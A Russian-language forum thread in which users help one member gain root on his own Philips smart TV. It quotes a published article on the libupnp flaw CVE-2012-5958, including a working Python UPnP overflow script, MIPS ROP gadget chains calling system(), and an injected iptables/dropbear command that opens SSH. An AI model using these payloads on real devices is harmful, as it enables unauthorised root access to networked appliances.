| Автор | Сообщение |
алеx3 Участник Сообщения: 3316
|
У меня возможно глупый вопрос а может и наоборот слишком заумный.
Интересует следующие как работает напрмиер команда ls, в плане что и как..., откуда..., начинает запускать--считывать , чтоб вывести мне на экран список дирректорий и файлов.
Существует ли гдето в линуксе файл где прописано все дерево каталогов и файлов в них. если существует то где?
Пытался гуглить но ничего не нашол, везде под пониманием работы каких либо команд в частности ls написано, типа набрав (выполнив) команду вы увидите результат на экране. И все как , оно работает, откуда вычитывает инфу не ясно. |
|
Paidj Участник Сообщения: 1352
|
| алеx3 писал: | У меня возможно глупый вопрос а может и наоборот слишком заумный.
Интересует следующие как работает напрмиер команда ls, в плане что и как..., откуда..., начинает запускать--считывать , чтоб вывести мне на экран список дирректорий и файлов.
Существует ли гдето в линуксе файл где прописано все дерево каталогов и файлов в них. если существует то где?
Пытался гуглить но ничего не нашол, везде под пониманием работы каких либо команд в частности ls написано, типа набрав (выполнив) команду вы увидите результат на экране. И все как , оно работает, откуда вычитывает инфу не ясно. |
Дерево файловой системы строится каждый раз заново, в ОЗУ. Некоторые каталоги (например /DEV) вообще пустые при неактивной системе. |
|
master-X79 Участник Сообщения: 4624
|
|
алеx3 Участник Сообщения: 3316
|
| Paidj писал: | | Дерево файловой системы строится каждый раз заново, в ОЗУ. Некоторые каталоги (например /DEV) вообще пустые при неактивной системе. |
| Paidj писал: | | Некоторые каталоги (например /DEV) вообще пустые при неактивной системе. |
просто не примонтировано в них ничего
master-X79, ну нет там что я хочу узнать , описание для пользователе мол есть команда cd для перехода по каталогам,
есть команда ls для обзора директорий ,
Счас про иноды нагуглил уже ближе ,
| Цитата: | каждый файл в Unix описывается с помощью
уникального inode (их, кстати, ещё называют индексами, далее я тоже
буду называть inode индексом, лень знаете ли постоянно переключать
раскладки :-) ) В индексе содержится информация определённого рода
(права доступа, размер, имя владельца, и т.д.). Как было сказано выше,
индексы живут на диске, но при работе с ними ядро создаёт их копии в
памяти |
и вот где хранится эта таблица? где путь к файлу сопостовляется к его иноду.
или как таже команда ls узнает что за файлы лежат в папке X |
|
vlad08 Предупреждений: 1 Сообщения: 177
|
|
master-X79 Участник Сообщения: 4624
|
|
uam Участник Сообщения: 2075
|
| алеx3 писал: | | Пытался гуглить но ничего не нашол, |
А Wiki?
#наконец дерево катологов рекурсивно
ls -R | grep ":$" | sed -e 's/:$//' -e 's/[^-][^\/]*\//--/g' -e 's/^/ /' -e 's/-/|/' |
|
алеx3 Участник Сообщения: 3316
|
uam, Вы меня не поняли ,
я хотел найти описание где почитать как работает команда ls на низком уровне чтоли.
а не как набрать в командной строке эту команду с разными вариантами её опций.
Поясню зачем мне это надо, есть устройство , где я могу если знаю путь к файлу скачать его через сеть.
но если я не знаю путь к файлу то я ничего не могу скачать.
так вот возможно есть какойто файл в файловой системе где можно посмотреть ссылки на файлы.
и этот файл является стандартным в файлофых системах linux как например /etc/proc etc/passwd |
|
uam Участник Сообщения: 2075
|
Я в nix совсем слаб.
Но теперь еще меньше понял.
Если через сеть, то как примонтирована удаленная файловая система? |
|
алеx3 Участник Сообщения: 3316
|
|
Paidj Участник Сообщения: 1352
|
Если упоминается "Reading host's SSH keys" может просто попытаться приконектится по SSH??? |
|
алеx3 Участник Сообщения: 3316
|
Только знать ещебы через какой порт и ли как еще,
а так пытался но возможно не получилось потому-что до этого никогда не делал такого. пишет что 22 порт по таймауту отключился.
ключи RSA скачал и приватный и публичный |
|
Paidj Участник Сообщения: 1352
|
| алеx3 писал: | Только знать ещебы через какой порт и ли как еще,
а так пытался но возможно не получилось потому-что до этого никогда не делал такого. пишет что 22 порт по таймауту отключился.
ключи RSA скачал и приватный и публичный |
А в /etc конфига под sshd случаем не валяется?
Как вариант попытаться сконектится по ssh через UART. |
|
алеx3 Участник Сообщения: 3316
|
| Paidj писал: | | А в /etc конфига под sshd случаем не валяется? |
наверняка есть , нужно точно знать название, для того и хотел найти как знать имена папок файлов и их пути в системе, тогда вычитаю
| Paidj писал: | | сконектится по ssh через UART. |
это интересно а как? еепром в режиме JettMode можно через уарт сливать, компаировской прогой.
Много ссылок на файлы подсмотрел в логах по UART
например деморолик фирменный от филипса серфингисты где.
https://yadi.sk/i/M9Vm8ASCqFGho |
|
Paidj Участник Сообщения: 1352
|
| алеx3 писал: | наверняка есть , нужно точно знать название, для того и хотел найти как знать имена папок файлов и их пути в системе, тогда вычитаю
|
Я так понимаю /etc/ssh/sshd_config некатит???
А на счёт UART я имел ввиду что конект через него предусмотрен в стандартном ssh, а вот слушает ли он его в конкретном случае(особенно если порт занят другим демоном) большая загадка.
Кстати, если к телику доступаешся по сети может сканирование портов сделать, например nmap??? |
|
алеx3 Участник Сообщения: 3316
|
| Paidj писал: | Я так понимаю /etc/ssh/sshd_config некатит???
А на счёт UART я имел ввиду что конект через него предусмотрен в стандартном ssh, а вот слушает ли он его в конкретном случае(особенно если порт занят другим демоном) большая загадка.
Кстати, если к телику доступаешся по сети может сканирование портов сделать, например nmap??? |
да sshd_config и ssh_config не видет или нет этих файлов, скорее както по другому обозваны или лежат гдето в другом месте.
с винды запускал Zenmap мне показалося что он больше нашол портов открытых
в скрепке приложил,
а чем putty ssh через терминал делать? в джет моде очень запросто может и достучуся.
есть исходники на этот тв , может в них можно что-то подсмотреть?
201603131745 Intense scan, all TCP ports на 192.168.105.136.rar 3,4 КБ Скачано: 33 раз(а)
|
|
алеx3 Участник Сообщения: 3316
|
Через порт 2323 принял соединение с zoc-терминала подключался по ssh но как то не понятно принять принял, в логах написал Accepted connection from '192.168.105.80' и все никаких действий консоль не дает вводить. |
|
Paidj Участник Сообщения: 1352
|
| алеx3 писал: | | Через порт 2323 принял соединение с zoc-терминала подключался по ssh но как то не понятно принять принял, в логах написал Accepted connection from '192.168.105.80' и все никаких действий консоль не дает вводить. |
Кстати помимо ssh надо проверить и возможность поддержки Telnet терминала.
В качестве клиента действительно пользую putty, исключительно за то что там всё в одном флаконе |
|
алеx3 Участник Сообщения: 3316
|
|
Paidj Участник Сообщения: 1352
|
Чтиво увлекательное, но готового решения там нет. Точнее там перечислены найденные уязвимости и что можно с помощью них получить.
Кстати если цель получить имена файлов, то вроде механизм распаковки обновления описан достаточно подробно, в результате были получены образы разделов. |
|
алеx3 Участник Сообщения: 3316
|
Paidj, ты уверен что нет готового решения там? ну не на уровни скрипта готового , а описания как переполнить стек , заставить выполнится нужный нам код и получить root
вот 4.1.1.3 EXPLOITATION и все что ниже , до примера где подключаются по SSH.
тот кто писал статью точно получил доступ через SSH.
| Цитата: | #!/usr/bin/python
import socket
pkt = "NOTIFY * HTTP/1.1\r\n" +\
"HOST: 239.255.255.250:1900\r\n" +\
"USN:uuid:schemas:device:" +\
"A" * 512 + ":end\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(pkt, ('239.255.255.250', 1900)) |
сей скрипт работает переполняет стек, и телик ребутится , все как в статье написано,
а вот как исполнить примеры что в статье
| Цитата: | Cette chaine profite de la restauration des registres lors de l'epilogue de la fonction vulnerable pour y placer les adresses des gadgets.
lw $ra, 0x15C($sp) # @gadget_1
lw $s3, 0x158($sp)
lw $s2, 0x154($sp) # @system()
lw $s1, 0x150($sp) # @gadget_2
lw $s0, 0x14C($sp) # @gadget_3
jr $ra # debut de l'exploitation
addiu $sp, 0x160
Le premier gadget de chaine copie l'adresse de la fonction system() dans $a3, et saute sur le gadget suivant.
move $a3, $s2 # @system()
lw $a1, 4($s0)
move $t9, $s1 # @gadget_2
jalr $t9
lw $a2, 8($s0)
Le second gadget fait pointer $a1 vers la commande systeme sur la pile, peu apres la chaine de ROP, et saute sur le gadget suivant.
addiu $a1, $sp, 0x18# commande systeme
move $t9, $s0 # @gadget_3
jalr $t9
move $a2, $zero
Le dernier copie $a1 dans $a0 et appelle la fonction system().
move $t9, $a3 # @system()
jalr $t9
move $a0, $a1 # commande systeme (branch delay slot)
La commande systeme que nous executons profite de la presence du binaire Dropbear pour ouvrir un acces SSH : | для меня как чайника в этих вопросах загадка, |
|
Paidj Участник Сообщения: 1352
|
на сколько я понял основная задача не root, а выполнить комманду
| Цитата: | | / SBIN / Iptables -A ВВОД -p TCP -m TCP --dport 22 J ACCEPT; / Usr / SBIN / -F Dropbear |
Если всё так, то получается что sshd запущен, но его порт зарублен через Iptables.
В статье же указанны инструменты mipsrop [11] и ROPgadget [12] с помощью которых формировали скрипт |
|
алеx3 Участник Сообщения: 3316
|
Paidj, так вот это | Цитата: | | /sbin/iptables -A INPUT -p tcp -m tcp --dport 22 -j ACCEPT ; /usr/sbin/dropbear -F |
я так понял выполнили через уязвимость на телике да?
чтоб открыть порт 22
Добавлено 14-04-2016 17:52
Вообщето если есть возможность получить доступ root в систему телика , то очень хочется это сделать, |
|
master-X79 Участник Сообщения: 4624
|
алеx3, так iptables вроди как и работает только через root ... |
|
Paidj Участник Сообщения: 1352
|
| алеx3 писал: | Paidj, так вот это | Цитата: | | /sbin/iptables -A INPUT -p tcp -m tcp --dport 22 -j ACCEPT ; /usr/sbin/dropbear -F |
я так понял выполнили через уязвимость на телике да?
чтоб открыть порт 22
Добавлено 14-04-2016 17:52
Вообщето если есть возможность получить доступ root в систему телика , то очень хочется это сделать, |
Я понял так: в сервисе UPnP есть косяк, отправкой нескольких пакетов(в 3 шага) мы можем вызвать выполнение комманды | Цитата: | | /sbin/iptables -A INPUT -p tcp -m tcp --dport 22 -j ACCEPT ; /usr/sbin/dropbear -F |
после этого можно конектится по SSH. Опять же на сколько я понял в системе все службы и так выполняются от лица root (в нарушении всех норм безопасности), поэтому когда мы вызываем переполнение стека dlnaApp(отвечающей за UPnP) у нас уже есть полномочия root |
|
алеx3 Участник Сообщения: 3316
|
| Paidj писал: | | в сервисе UPnP есть косяк, отправкой нескольких пакетов(в 3 шага) мы можем вызвать выполнение комманды |
Вот да ,
хочу разобраться как их эти пакеты отправить, |
|
moroz.v Участник Сообщения: 113
|
|
алеx3 Участник Сообщения: 3316
|
moroz.v, у меня хром на лету переводит, еслиб дело в переводчике было , тут с нуля прокурить нужно толмудов кучу. |
|
Paidj Участник Сообщения: 1352
|
| алеx3 писал: | | Paidj писал: | | в сервисе UPnP есть косяк, отправкой нескольких пакетов(в 3 шага) мы можем вызвать выполнение комманды |
Вот да ,
хочу разобраться как их эти пакеты отправить, |
Я же говорил "инструкции" там нет, примерно так описывают устройство ядрёной бомбы в учебниках по физике: вроде всё понятно, но повторить с ходу невозможно.
Исходные данные у нас следующие:
Нам надо выполнить "атаку переполнения буфера на архитектуре MIPS".
Уязвимость которую мы можем эксплуатировать - при реализации сервиса UPnP использована уязвимая версии библиотеки libupnp известная по бюллетеню CVE-2012-5958, об уязвимости сообщил пользователь известный как Rapid7.
В статье, при реализации атаки использованы инструменты mipsrop [11] и ROPgadget [12] ссылки на описание которых есть в конце статьи.
После осмысления материала по перечисленным темам наверняка удастся осуществить задуманное. |
|
алеx3 Участник Сообщения: 3316
|
| алеx3 писал: | lw $ra, 0x15C($sp) # @gadget_1
lw $s3, 0x158($sp)
lw $s2, 0x154($sp) # @system()
lw $s1, 0x150($sp) # @gadget_2
lw $s0, 0x14C($sp) # @gadget_3
jr $ra # debut de l'exploitation
addiu $sp, 0x160 |
ну вообщето это я так понял уже и есть цепочка этих гаджетов, вытянутая из наверное распакованой прошивки, инструментами mipsrop [11] и ROPgadget [12] , |
|